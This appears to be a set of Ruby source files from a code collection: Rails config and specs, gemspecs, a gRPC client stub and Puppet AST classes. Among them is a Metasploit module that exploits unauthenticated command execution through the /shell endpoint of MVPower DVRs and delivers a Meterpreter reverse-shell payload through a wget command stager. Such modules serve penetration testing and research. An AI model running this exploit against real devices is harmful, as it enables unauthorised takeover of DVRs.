# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.016949 | 85 | 0.759439 |
1aca2bd1839a19ff52479d6acc99762c1d5d1e7a | 36 | class Paper < ApplicationRecord
end
| 12 | 31 | 0.833333 |
b92ed48b86890657187c887364f20865fded0bbd | 69 | module Autoloaded
module Module1
class A
end
end
end | 11.5 | 18 | 0.637681 |
e20df49c3500c5d4de40f00838176f11fbbf8cb2 | 2,015 | require "spec_helper"
describe "routing for people", type: :routing do
before(:each) do
@community = FactoryGirl.create(:community)
@protocol_and_host = "http://#{@community.ident}.test.host"
@person = FactoryGirl.create(:person)
end
it "routes /:username to people controller" do
expect(get "/#{@person.username}").to(
route_to(
{
:controller => "people",
:action => "show",
:id => @person.username
}
)
)
end
it "routes /:username/settings to settings controller" do
expect(get "/#{@person.username}/settings").to(
route_to(
{
:controller => "settings",
:action => "show",
:person_id => @person.username
}
)
)
end
it "routes /en to login page" do
expect(get "#{@protocol_and_host}/en").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "en"
}))
end
it "routes /pt-BR to login page" do
expect(get "/pt-BR").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "pt-BR"
}))
end
it "routes / to login page" do
expect(get "/").to(
route_to({
:controller => "sessions",
:action => "new"
}))
end
it "routes /login to login" do
expect(get "/login").to(
route_to({
:controller => "sessions",
:action => "new"
}))
end
it "routes /logout to logout" do
expect(get "/logout").to(
route_to({
:controller => "sessions",
:action => "destroy"
}))
end
it "routes /en/login to login" do
expect(get "/en/login").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "en"
}))
end
end
| 23.430233 | 63 | 0.466005 |
1dee09318660904923d82a64d33ec64b913c8058 | 138 | class FixTypeOnItem < ActiveRecord::Migration[5.1]
def change
rename_column :items, :rejection_resason, :rejection_reason
end
end
| 23 | 63 | 0.775362 |
5dd6208599444eb006e8a9cf00b122002e98a642 | 1,729 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{ruby-encoding-wrapper}
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Mikhailov Anatoly", "Tsech Edward", "Anton Zaytsev"]
s.date = %q{2011-07-03}
s.description = %q{Simple wrapper for encoding.com API based on ruby.}
s.email = %q{[email protected]}
s.extra_rdoc_files = [
"README"
]
s.files = [
"Gemfile",
"Gemfile.lock",
"MIT-LICENSE",
"README",
"Rakefile",
"VERSION",
"init.rb",
"install.rb",
"lib/encoding_wrapper.rb",
"lib/encoding_wrapper/queue.rb",
"ruby-encoding-wrapper.gemspec",
"test/test.rb",
"test/test_list.rb",
"uninstall.rb"
]
s.homepage = %q{https://github.com/mikhailov/ruby-encoding-wrapper}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.6.2}
s.summary = nil
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_development_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_development_dependency(%q<jeweler>, ["~> 1.6.3"])
else
s.add_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_dependency(%q<jeweler>, ["~> 1.6.3"])
end
else
s.add_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_dependency(%q<jeweler>, ["~> 1.6.3"])
end
end
| 29.810345 | 105 | 0.625217 |
1884dcba2461b084f567f916d1229cd13e14b926 | 20,162 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require_relative 'active_call'
require_relative '../version'
# GRPC contains the General RPC module.
module GRPC
# rubocop:disable Metrics/ParameterLists
# ClientStub represents a client connection to a gRPC server, and can be used
# to send requests.
class ClientStub
include Core::StatusCodes
include Core::TimeConsts
# Default timeout is infinity.
DEFAULT_TIMEOUT = INFINITE_FUTURE
# setup_channel is used by #initialize to construct a channel from its
# arguments.
def self.setup_channel(alt_chan, host, creds, channel_args = {})
unless alt_chan.nil?
fail(TypeError, '!Channel') unless alt_chan.is_a?(Core::Channel)
return alt_chan
end
if channel_args['grpc.primary_user_agent'].nil?
channel_args['grpc.primary_user_agent'] = ''
else
channel_args['grpc.primary_user_agent'] += ' '
end
channel_args['grpc.primary_user_agent'] += "grpc-ruby/#{VERSION}"
unless creds.is_a?(Core::ChannelCredentials) || creds.is_a?(Symbol)
fail(TypeError, '!ChannelCredentials or Symbol')
end
Core::Channel.new(host, channel_args, creds)
end
# Allows users of the stub to modify the propagate mask.
#
# This is an advanced feature for use when making calls to another gRPC
# server whilst running in the handler of an existing one.
attr_writer :propagate_mask
# Creates a new ClientStub.
#
# Minimally, a stub is created with the just the host of the gRPC service
# it wishes to access, e.g.,
#
# my_stub = ClientStub.new(example.host.com:50505,
# :this_channel_is_insecure)
#
# If a channel_override argument is passed, it will be used as the
# underlying channel. Otherwise, the channel_args argument will be used
# to construct a new underlying channel.
#
# There are some specific keyword args that are not used to configure the
# channel:
#
# - :channel_override
# when present, this must be a pre-created GRPC::Core::Channel. If it's
# present the host and arbitrary keyword args are ignored, and the RPC
# connection uses this channel.
#
# - :timeout
# when present, this is the default timeout used for calls
#
# @param host [String] the host the stub connects to
# @param creds [Core::ChannelCredentials|Symbol] the channel credentials, or
# :this_channel_is_insecure, which explicitly indicates that the client
# should be created with an insecure connection. Note: this argument is
# ignored if the channel_override argument is provided.
# @param channel_override [Core::Channel] a pre-created channel
# @param timeout [Number] the default timeout to use in requests
# @param propagate_mask [Number] A bitwise combination of flags in
# GRPC::Core::PropagateMasks. Indicates how data should be propagated
# from parent server calls to child client calls if this client is being
# used within a gRPC server.
# @param channel_args [Hash] the channel arguments. Note: this argument is
# ignored if the channel_override argument is provided.
# @param interceptors [Array<GRPC::ClientInterceptor>] An array of
# GRPC::ClientInterceptor objects that will be used for
# intercepting calls before they are executed
# Interceptors are an EXPERIMENTAL API.
def initialize(host, creds,
channel_override: nil,
timeout: nil,
propagate_mask: nil,
channel_args: {},
interceptors: [])
@ch = ClientStub.setup_channel(channel_override, host, creds,
channel_args.dup)
alt_host = channel_args[Core::Channel::SSL_TARGET]
@host = alt_host.nil? ? host : alt_host
@propagate_mask = propagate_mask
@timeout = timeout.nil? ? DEFAULT_TIMEOUT : timeout
@interceptors = InterceptorRegistry.new(interceptors)
end
# request_response sends a request to a GRPC server, and returns the
# response.
#
# == Flow Control ==
# This is a blocking call.
#
# * it does not return until a response is received.
#
# * the requests is sent only when GRPC core's flow control allows it to
# be sent.
#
# == Errors ==
# A RuntimeError is raised if
#
# * the server responds with a non-OK status
#
# * the deadline is exceeded
#
# == Return Value ==
#
# If return_op is false, the call returns the response
#
# If return_op is true, the call returns an Operation, calling execute
# on the Operation returns the response.
#
# @param method [String] the RPC method to call on the GRPC server
# @param req [Object] the request sent to the server
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @return [Object] the response received from the server
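#
# == Example ==
#
# An illustrative call, assuming `marshal`/`unmarshal` procs and a
# hypothetical method path:
#
# stub = ClientStub.new('example.host.com:50505', :this_channel_is_insecure)
# resp = stub.request_response('/pkg.Service/Method', req, marshal,
# unmarshal, metadata: { 'k' => 'v' })
#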
def request_response(method, req, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {})
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
request: req,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute as a
# new method for this instance that invokes #request_response.
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:request_response, intercept_args) do
c.request_response(req, metadata: metadata)
end
end
op
else
interception_context.intercept!(:request_response, intercept_args) do
c.request_response(req, metadata: metadata)
end
end
end
# client_streamer sends a stream of requests to a GRPC server, and
# returns a single response.
#
# requests provides an 'iterable' of Requests. I.e. it follows Ruby's
# #each enumeration protocol. In the simplest case, requests will be an
# array of marshallable objects; in the typical case it will be an Enumerable
# that allows dynamic construction of the marshallable objects.
#
# == Flow Control ==
# This is a blocking call.
#
# * it does not return until a response is received.
#
# * each request is sent only when GRPC core's flow control allows it to
# be sent.
#
# == Errors ==
# A RuntimeError is raised if
#
# * the server responds with a non-OK status
#
# * the deadline is exceeded
#
# == Return Value ==
#
# If return_op is false, the call consumes the requests and returns
# the response.
#
# If return_op is true, the call returns the response.
#
# @param method [String] the RPC method to call on the GRPC server
# @param requests [Object] an Enumerable of requests to send
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @return [Object|Operation] the response received from the server
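#
# == Example ==
#
# An illustrative call with a hypothetical method path; any Enumerable
# of marshallable requests works:
#
# requests = [req1, req2]
# resp = stub.client_streamer('/pkg.Service/Upload', requests, marshal,
# unmarshal)
#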
def client_streamer(method, requests, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {})
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
requests: requests,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute as a
# new method for this instance that invokes #client_streamer.
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:client_streamer, intercept_args) do
c.client_streamer(requests)
end
end
op
else
interception_context.intercept!(:client_streamer, intercept_args) do
c.client_streamer(requests, metadata: metadata)
end
end
end
# server_streamer sends one request to the GRPC server, which yields a
# stream of responses.
#
# responses provides an enumerator over the streamed responses, i.e. it
# follows Ruby's #each iteration protocol. The enumerator blocks while
# waiting for each response, stops when the server signals that no
# further responses will be supplied. If the implicit block is provided,
# it is executed with each response as the argument and no result is
# returned.
#
# == Flow Control ==
# This is a blocking call.
#
# * the request is sent only when GRPC core's flow control allows it to
# be sent.
#
# * the request will not complete until the server sends the final
# response followed by a status message.
#
# == Errors ==
# A RuntimeError is raised if
#
# * the server responds with a non-OK status when any response is
# retrieved
#
# * the deadline is exceeded
#
# == Return Value ==
#
# if the return_op is false, the return value is an Enumerator of the
# results, unless a block is provided, in which case the block is
# executed with each response.
#
# if return_op is true, the function returns an Operation whose #execute
# method runs server streamer call. Again, Operation#execute either
# calls the given block with each response or returns an Enumerator of the
# responses.
#
# == Keyword Args ==
#
# Unspecified keyword arguments are treated as metadata to be sent to the
# server.
#
# @param method [String] the RPC method to call on the GRPC server
# @param req [Object] the request sent to the server
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @param blk [Block] when provided, is executed for each response
# @return [Enumerator|Operation|nil] as discussed above
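#
# == Example ==
#
# An illustrative call with a hypothetical method path and handler,
# using the block form to consume each streamed response:
#
# stub.server_streamer('/pkg.Service/List', req, marshal, unmarshal) do |resp|
# handle(resp) # hypothetical handler
# end
#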
def server_streamer(method, req, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {},
&blk)
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
request: req,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute
# as a new method for this instance that invokes #server_streamer
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:server_streamer, intercept_args) do
c.server_streamer(req, &blk)
end
end
op
else
interception_context.intercept!(:server_streamer, intercept_args) do
c.server_streamer(req, metadata: metadata, &blk)
end
end
end
# bidi_streamer sends a stream of requests to the GRPC server, and yields
# a stream of responses.
#
# This method takes an Enumerable of requests, and returns an enumerable
# of responses.
#
# == requests ==
#
# requests provides an 'iterable' of Requests. I.e. it follows Ruby's
# #each enumeration protocol. In the simplest case, requests will be an
# array of marshallable objects; in the typical case it will be an
# Enumerable that allows dynamic construction of the marshallable
# objects.
#
# == responses ==
#
# This is an enumerator of responses. I.e., its #next method blocks
# waiting for the next response. Also, if at any point the block needs
# to consume all the remaining responses, this can be done using #each or
# #collect. Calling #each or #collect should only be done if
# the_call#writes_done has been called, otherwise the block will loop
# forever.
#
# == Flow Control ==
# This is a blocking call.
#
# * the call completes when the next call to the provided block returns
# false
#
# * the execution block parameters are two objects for sending and
# receiving responses, each of which blocks waiting for flow control.
# E.g., calls to bidi_call#remote_send will wait until flow control
# allows another write before returning; and obviously calls to
# responses#next block until the next response is available.
#
# == Termination ==
#
# As well as sending and receiving messages, the block passed to the
# function is also responsible for:
#
# * calling bidi_call#writes_done to indicate no further reqs will be
# sent.
#
# * returning false once the bidi stream is functionally completed.
#
# Note that response#next will indicate that there are no further
# responses by throwing StopIteration, but this can only happen
# once bidi_call#writes_done is called.
#
# To properly terminate the RPC, the responses should be completely iterated
# through; one way to do this is to loop on responses#next until no further
# responses are available.
#
# == Errors ==
# A RuntimeError is raised if
#
# * the server responds with a non-OK status when any response is
# retrieved
#
# * the deadline is exceeded
#
#
# == Return Value ==
#
# if the return_op is false, the return value is an Enumerator of the
# results, unless a block is provided, in which case the block is
# executed with each response.
#
# if return_op is true, the function returns an Operation whose #execute
# method runs the Bidi call. Again, Operation#execute either calls a
# given block with each response or returns an Enumerator of the
# responses.
#
# @param method [String] the RPC method to call on the GRPC server
# @param requests [Object] an Enumerable of requests to send
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @param blk [Block] when provided, is executed for each response
# @return [Enumerator|nil|Operation] as discussed above
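#
# == Example ==
#
# An illustrative call with a hypothetical method path; the returned
# enumerator is iterated to completion to terminate the RPC cleanly:
#
# requests = [req1, req2].each
# replies = stub.bidi_streamer('/pkg.Service/Chat', requests, marshal,
# unmarshal)
# replies.each { |resp| handle(resp) } # hypothetical handler
#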
def bidi_streamer(method, requests, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {},
&blk)
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
requests: requests,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute
# as a new method for this instance that invokes #bidi_streamer
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:bidi_streamer, intercept_args) do
c.bidi_streamer(requests, &blk)
end
end
op
else
interception_context.intercept!(:bidi_streamer, intercept_args) do
c.bidi_streamer(requests, metadata: metadata, &blk)
end
end
end
private
# Creates a new active stub
#
# @param method [string] the method being called.
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param parent [Grpc::Call] a parent call, available when calls are
# made from server
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
def new_active_call(method, marshal, unmarshal,
deadline: nil,
parent: nil,
credentials: nil)
deadline = from_relative_time(@timeout) if deadline.nil?
# Provide each new client call with its own completion queue
call = @ch.create_call(parent, # parent call
@propagate_mask, # propagation options
method,
nil, # host: use nil
deadline)
call.set_credentials! credentials unless credentials.nil?
ActiveCall.new(call, marshal, unmarshal, deadline,
started: false)
end
end
end
| 40.163347 | 80 | 0.63947 |
bbb100de21ed35b547e9a1d183acae43d6eb84b1 | 1,299 | # -*- encoding: utf-8 -*-
# stub: equalizer 0.0.11 ruby lib
Gem::Specification.new do |s|
s.name = "equalizer"
s.version = "0.0.11"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Dan Kubb", "Markus Schirp"]
s.date = "2015-03-23"
s.description = "Module to define equality, equivalence and inspection methods"
s.email = ["[email protected]", "[email protected]"]
s.extra_rdoc_files = ["LICENSE", "README.md", "CONTRIBUTING.md"]
s.files = ["CONTRIBUTING.md", "LICENSE", "README.md"]
s.homepage = "https://github.com/dkubb/equalizer"
s.licenses = ["MIT"]
s.required_ruby_version = Gem::Requirement.new(">= 1.8.7")
s.rubygems_version = "2.4.5"
s.summary = "Module to define equality, equivalence and inspection methods"
s.installed_by_version = "2.4.5" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
else
s.add_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
end
else
s.add_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
end
end
| 36.083333 | 105 | 0.656659 |
e2f142f3090a6357c00ef72eaeb4fe590ef9ae2e | 3,201 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'MVPower DVR Shell Unauthenticated Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution
vulnerability in MVPower digital video recorders. The 'shell' file
on the web interface executes arbitrary operating system commands in
the query string.
This module was tested successfully on a MVPower model TV-7104HE with
firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
},
'Author' =>
[
'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
# Comment from Paul Davies contains probably the first published PoC
[ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
# Writeup with PoC by Andrew Tierney from Pen Test Partners
[ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
],
'DisclosureDate' => '2015-08-23',
'Privileged' => true, # BusyBox
'Arch' => ARCH_ARMLE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'Targets' =>
[
['Automatic', {}]
],
'CmdStagerFlavor' => %w{ echo printf wget },
'DefaultTarget' => 0))
end
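# Illustrative raw request for the vulnerable 'shell' endpoint described
# above; the command shown is an example only:
#
#   GET /shell?cat%20/etc/passwd HTTP/1.1
#
# The query string is executed directly as an operating system command
# on the DVR.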
def check
begin
fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
res = send_request_cgi(
'method' => 'GET',
'uri' => '/shell',
'query' => "echo+#{fingerprint}",
'headers' => { 'Connection' => 'Keep-Alive' }
)
if res && res.body.include?(fingerprint)
return CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return CheckCode::Unknown
end
CheckCode::Safe
end
def execute_command(cmd, opts)
begin
send_request_cgi(
'uri' => '/shell',
'query' => Rex::Text.uri_encode(cmd, 'hex-all'),
'headers' => { 'Connection' => 'Keep-Alive' }
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("#{peer} - Connecting to target")
unless check == CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
end
print_good("#{peer} - Target is vulnerable!")
execute_cmdstager(linemax: 1500)
end
end
| 31.693069 | 97 | 0.601687 |
1a7c6775f0920ca032b53de417f88565d82d667e | 790 | #
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
require 'ingenico/connect/sdk/data_object'
module Ingenico::Connect::SDK
module Domain
module Payment
# @attr [String] merchant_reference
class OrderReferencesApprovePayment < Ingenico::Connect::SDK::DataObject
attr_accessor :merchant_reference
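# Usage sketch (the merchant reference value is hypothetical):
#   ref = OrderReferencesApprovePayment.new
#   ref.merchant_reference = 'order-1234'
#   ref.to_h # includes 'merchantReference' => 'order-1234'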
# @return [Hash]
def to_h
hash = super
hash['merchantReference'] = @merchant_reference unless @merchant_reference.nil?
hash
end
def from_hash(hash)
super
if hash.has_key? 'merchantReference'
@merchant_reference = hash['merchantReference']
end
end
end
end
end
end
| 23.939394 | 89 | 0.64557 |
f87bec928b4ecb290681613257f152eca83f10d4 | 662 | class Api::V1::CollectionsController < ApplicationController
def index
collections = Collection.all
render json: CollectionSerializer.new(collections)
end
def create
collection = Collection.new(collection_params)
if collection.save
render json: CollectionSerializer.new(collection), status: :accepted
else
render json: {errors: collection.errors.full_messages}, status: :unprocessable_entity
end
end
def show
collection = Collection.find(params[:id])
render json: CollectionSerializer.new(collection)
end
private
def collection_params
params.require(:collection).permit(:name)
end
end | 24.518519 | 91 | 0.732628 |
082561fd400c96449d2f11da7811969cdde16faa | 5,607 | class Puppet::Parser::AST
# The base class for all of the leaves of the parse trees. These
# basically just have types and values. Both of these parameters
# are simple values, not AST objects.
class Leaf < AST
attr_accessor :value, :type
# Return our value.
def evaluate(scope)
@value
end
def match(value)
@value == value
end
def to_s
@value.to_s unless @value.nil?
end
end
# The boolean class. True or false. Converts the string it receives
# to a Ruby boolean.
class Boolean < AST::Leaf
# Use the parent method, but then convert to a real boolean.
def initialize(hash)
super
unless @value == true or @value == false
raise Puppet::DevError,
"'#{@value}' is not a boolean"
end
@value
end
def to_s
@value ? "true" : "false"
end
end
# The base string class.
class String < AST::Leaf
def evaluate(scope)
@value.dup
end
def to_s
"\"#{@value}\""
end
end
# An uninterpreted string.
class FlatString < AST::Leaf
def evaluate(scope)
@value
end
def to_s
"\"#{@value}\""
end
end
class Concat < AST::Leaf
def evaluate(scope)
@value.collect { |x| x.evaluate(scope) }.collect{ |x| x == :undef ? '' : x }.join
end
def to_s
"#{@value.map { |s| s.to_s.gsub(/^"(.*)"$/, '\1') }.join}"
end
end
# The 'default' option on case statements and selectors.
class Default < AST::Leaf; end
# Capitalized words; used mostly for type-defaults, but also
# get returned by the lexer any other time an unquoted capitalized
# word is found.
class Type < AST::Leaf; end
# Lower-case words.
class Name < AST::Leaf; end
# double-colon separated class names
class ClassName < AST::Leaf; end
# undef values; equiv to nil
class Undef < AST::Leaf; end
# Host names, either fully qualified or just the short name, or even a regex
class HostName < AST::Leaf
def initialize(hash)
super
# Note that this is an AST::Regex, not a Regexp
@value = @value.to_s.downcase unless @value.is_a?(Regex)
if @value =~ /[^-\w.]/
raise Puppet::DevError,
"'#{@value}' is not a valid hostname"
end
end
# implementing eql? and hash so that when an HostName is stored
# in a hash it has the same hashing properties as the underlying value
def eql?(value)
value = value.value if value.is_a?(HostName)
@value.eql?(value)
end
def hash
@value.hash
end
def to_s
@value.to_s
end
end
# A simple variable. This object is only used during interpolation;
# the VarDef class is used for assignment.
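# For example, "$foo" inside a manifest or interpolated string parses
# into a Variable node, while the assignment "$foo = 'bar'" uses VarDef.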
class Variable < Name
# Looks up the value of the object in the scope tree (does
# not include syntactical constructs, like '$' and '{}').
def evaluate(scope)
parsewrap do
if (var = scope.lookupvar(@value, :file => file, :line => line)) == :undefined
var = :undef
end
var
end
end
def to_s
"\$#{value}"
end
end
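# Access into a hash or array variable, e.g. $foo['bar'] or $foo[0];
# also handles assignment to such an index via #assign.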
class HashOrArrayAccess < AST::Leaf
attr_accessor :variable, :key
def evaluate_container(scope)
container = variable.respond_to?(:evaluate) ? variable.safeevaluate(scope) : variable
(container.is_a?(Hash) or container.is_a?(Array)) ? container : scope.lookupvar(container, :file => file, :line => line)
end
def evaluate_key(scope)
key.respond_to?(:evaluate) ? key.safeevaluate(scope) : key
end
def array_index_or_key(object, key)
if object.is_a?(Array)
raise Puppet::ParseError, "#{key} is not an integer, but is used as an index of an array" unless key = Puppet::Parser::Scope.number?(key)
end
key
end
def evaluate(scope)
object = evaluate_container(scope)
accesskey = evaluate_key(scope)
raise Puppet::ParseError, "#{variable} is not a hash or array when accessing it with #{accesskey}" unless object.is_a?(Hash) or object.is_a?(Array)
object[array_index_or_key(object, accesskey)] || :undef
end
# Assign value to this hashkey or array index
def assign(scope, value)
object = evaluate_container(scope)
accesskey = evaluate_key(scope)
if object.is_a?(Hash) and object.include?(accesskey)
raise Puppet::ParseError, "Assigning to the hash '#{variable}' with an existing key '#{accesskey}' is forbidden"
end
# assign to hash or array
object[array_index_or_key(object, accesskey)] = value
end
def to_s
"\$#{variable.to_s}[#{key.to_s}]"
end
end
class Regex < AST::Leaf
def initialize(hash)
super
@value = Regexp.new(@value) unless @value.is_a?(Regexp)
end
# we're returning self here to wrap the regexp and to be used in places
# where a string would have been used, without modifying any client code.
# For instance, in many places we have the following code snippet:
# val = @val.safeevaluate(@scope)
# if val.match(otherval)
# ...
# end
# this way, we don't have to modify this test specifically for handling
# regexes.
def evaluate(scope)
self
end
def evaluate_match(value, scope, options = {})
value = value == :undef ? '' : value.to_s
if matched = @value.match(value)
scope.ephemeral_from(matched, options[:file], options[:line])
end
matched
end
def match(value)
@value.match(value)
end
def to_s
"/#{@value.source}/"
end
end
end
| 25.256757 | 154 | 0.623328 |
398477a680ebc77e882352ae01e9fa21b5e93a0e | 1,341 | require 'spec_helper'
RSpec.describe 'Coinexmarket integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:btc_ltc_pair) { Cryptoexchange::Models::MarketPair.new(base: 'btc', target: 'ltc', market: 'coinexmarket') }
it 'fetch pairs' do
pairs = client.pairs('coinexmarket')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'coinexmarket'
end
it 'fetch ticker' do
ticker = client.ticker(btc_ltc_pair)
expect(ticker.base).to eq 'BTC'
expect(ticker.target).to eq 'LTC'
expect(ticker.market).to eq 'coinexmarket'
expect(ticker.last).to be_a Numeric
expect(ticker.volume).to be_a Numeric
expect(ticker.timestamp).to be nil
expect(ticker.payload).to_not be nil
end
it 'fetch order book' do
order_book = client.order_book(btc_ltc_pair)
expect(order_book.base).to eq 'BTC'
expect(order_book.target).to eq 'LTC'
expect(order_book.market).to eq 'coinexmarket'
expect(order_book.asks).to_not be_empty
expect(order_book.bids).to_not be_empty
expect(order_book.asks.first).to_not be_nil
expect(order_book.bids.first).to_not be_nil
expect(order_book.timestamp).to be_a Numeric
expect(order_book.payload).to_not be nil
end
end
| 31.186047 | 115 | 0.716629 |
ede75b81cf0efb33cdfbaf146b5adc9233ff6c89 | 974 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/errors/id_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/errors/id_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.errors.IdErrorEnum" do
end
add_enum "google.ads.googleads.v3.errors.IdErrorEnum.IdError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :NOT_FOUND, 2
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Errors
IdErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.IdErrorEnum").msgclass
IdErrorEnum::IdError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.IdErrorEnum.IdError").enummodule
end
end
end
end
end
| 31.419355 | 154 | 0.725873 |
d51e11c98e6a9be21f839c31cdce29c0444964f6 | 233 | class Group < ActiveRecord::Base
validates_presence_of :name
has_many :item_groups
has_many :items, through: :item_groups
has_many :users, through: :items
extend Slugify::ClassMethods
include Slugify::InstanceMethods
end
